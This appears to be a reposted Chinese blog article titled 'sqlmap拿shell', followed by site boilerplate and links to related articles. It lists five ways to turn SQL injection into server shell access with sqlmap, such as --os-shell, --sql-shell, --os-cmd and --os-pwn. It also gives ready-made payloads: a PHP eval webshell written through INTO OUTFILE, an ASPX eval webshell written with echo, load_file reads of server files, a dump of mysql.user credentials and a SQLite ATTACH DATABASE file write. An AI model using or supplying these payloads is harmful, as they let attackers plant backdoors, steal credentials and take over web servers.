sqlmap拿shell

这篇具有很好参考价值的文章主要介绍了sqlmap拿shell。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

sqlmap5种思路拿shell总结

①利用dump 管理员类的账户后进入进行站点后拿shell
或者拿到账户后远程连接进行连接进行udf类提取类拿shell
#连接方法
sqlmap -d “mysql://admin:password@192.168.1.1:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看

②利用os-shell 
拿shell
条件①知绝对路径
    ②管理员权限
    ③开启
③利用sql-shell拿shell
条件:dba权限
思路
select host,user,password from mysql.user 读取账户类
select load_file(’/home/wwwroot/index.php’)   
select '<?php @eval($_POST[a]);?>'INTO OUTFILE '/home/wwwroot/default/p.php’
写马

④利用os-cmd拿shell
条件
dba-权限
xp_cmdshell开启
如下
判断方法
--os-cmd=whoami
⑤--os-pwn
结合msf提马

sqlmap拿shell
获取绝对路径方法

①sql-shell方法
利用读取配置文件去获取
②os-shell方法
dir /s /b d:\"aa.txt"

写马

①基础的写文件到txt中
echo “thisis test”>d:\matata\t1.txt
②写马到目录文件中
echo ^<%@ Page Language=”Jscript”%^>^<%eval(Request.Item[“pass”],”unsafe”);%^> > d:\matata\test.aspx
#注意 有时候会出现找不到路径的问题
原因:①目录被限制不能写文件-->典型宝塔的权限为777类型chmod的状况特点

可能遇到的情况
sqlmap拿shell
原因:①中文路径的原因
②可能是注册表的问题
原因

从sql server注入到getshell
os-shell爬坑
mssql注入实战总结之狠快准绕
注意:oracle数据库 只支持sql-shell命令

oracle利用java反弹拿shell

特殊:sqlite数据库拿shell

方法一:进入后台去拿shell
方法二:手工注入执行下面的语句拿shell
sqlite aspx拿shell分析以及方法
php拿shell方法

在注入点处执行以下的代码 
'; ATTACH DATABASE '23.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');

然后生成一个23.php的文件就可以直接访问phpinfo的文件

sqlmap拿shell文章来源地址https://www.toymoban.com/news/detail-492678.html

到了这里,关于sqlmap拿shell的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 利用sqlmap进行post注入学习笔记

    sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 1.在登录处,用于判断用户名、密码会使用select语句;

    2024年02月13日
    浏览(29)
  • Angular安全专辑之三:授权绕过,利用漏洞控制管理员账户

    这篇文章是针对实际项目中所出现的问题所做的一个总结。简单来说,就是授权绕过问题,管理员帐户被错误的接管。 详细情况是这样的,我们的项目中通常都会有 用户身份验证功能 ,不同的用户拥有不同的权限。相对来说管理员账户所对应的权限是极高的,它可以修改当

    2024年02月11日
    浏览(24)
  • 在kali linux里利用SQLmap实现SQL注入

    SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不

    2024年02月04日
    浏览(36)
  • WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF

    访问使用阿里云搭建的网站(存在自带的阿里云盾)。 可以看到此时网站可以正常访问,可以进行正常注入。 使用工具进行注入。 可以看到在使用工具注入没多久后便返回了不存在注入点的信息。 因为经常会用到SQLMAP这款工具对注入点进行检测,在遇到WAF时,如果还想继续

    2024年02月12日
    浏览(36)
  • 通过Kali利用serv-u漏洞获取win7系统管理员权限

    serv-u5.0.0.0版本下载链接:https://pan.baidu.com/s/1kRyByC1SbipRMrbLdd6f1w 提取码:m4of 环境说明 机器 ip地址 Kali主机 192.168.231.129 win7靶机 192.168.231.143 (一)、进行serv-u程序的安装和配置 1.首先将压缩包中的三个文件拖到win7中,包括一个serv-u程序的setup,还有两个txt文档; 2.然后双击s

    2024年02月08日
    浏览(42)
  • 利用Sqlmap API接口联动Google Hacking批量SQL注入检测

    目录 前言 slghack自动化搜集URL Sqlmap API 脚本slghack_sqli 挖掘SQL注入漏洞的一种方式就是通过Google Hacking搜索那些可能存在SQL的URL,然后手工的探测注入点。但是现在的SQL注入漏洞的网站是比较少的了,所以这样一个一个手工测效率有一点低。 sqlmap比较好的一点是可批量扫描多个

    2024年04月14日
    浏览(27)
  • 渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)

    环境:对某网站进行渗透测试。 (PHP+Mysql开发的网站,用于WEB漏洞教学和检测的) 工具:sqlmap(Kali Linux中自带or官网下载Windows版) 此次实验所涉及的sqlmap参数: 一、信息收集 二、漏洞挖掘 (1)判断网站是否存在sql注入漏洞 使用工具,sqlmap: sqlmap -u \\\"目标网站地址\\\" --ba

    2024年02月15日
    浏览(36)
  • 利用Python和Selenium编程,实现定时自动检索特定网页,发现特定网页内容发生变化后,向管理员发送提醒邮件(一)

            要求爬取某单位网站,登录后台查看是否有新增“网友提问”,如果有新的提问,向特定邮箱发出提醒邮件。 首先查看该网站的robots.txt文件,发现不存在该文件,由于未禁止,可用爬取取相关信息。 查看是否有网友提问的操作流程如下。 1、登录网站后台管理页面

    2024年02月17日
    浏览(58)
  • 文件包含漏洞利用思路

    通过 PHP 函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,导致意外的文件泄漏甚至恶意代码注入。 php中常见的文件包含函数有以下四种: include() require() include_once() require_once() include与require基本是相同的,除了错误处理方面: include(),只生成

    2024年02月16日
    浏览(28)
  • 网络安全--XXE漏洞利用思路

    介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一

    2024年02月13日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包